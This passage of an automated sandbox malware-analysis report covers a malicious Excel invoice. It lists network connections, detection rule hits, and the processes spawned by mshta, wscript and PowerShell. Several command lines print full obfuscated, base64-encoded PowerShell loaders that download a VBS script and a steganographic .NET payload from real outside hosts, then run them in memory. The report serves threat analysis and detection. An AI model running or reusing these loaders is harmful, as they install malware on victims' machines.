            Source: powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
            Source: powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438873247.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439302235.0000000003C2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/
            Source: mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49166 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49173 version: TLS 1.2
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Invoice A037.xlsOLE: Microsoft Excel 2007+
            Source: Invoice A037.xlsOLE: Microsoft Excel 2007+
            Source: CA430000.0.drOLE: Microsoft Excel 2007+
            Source: CA430000.0.drOLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].htaJump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $AngelJump to behavior
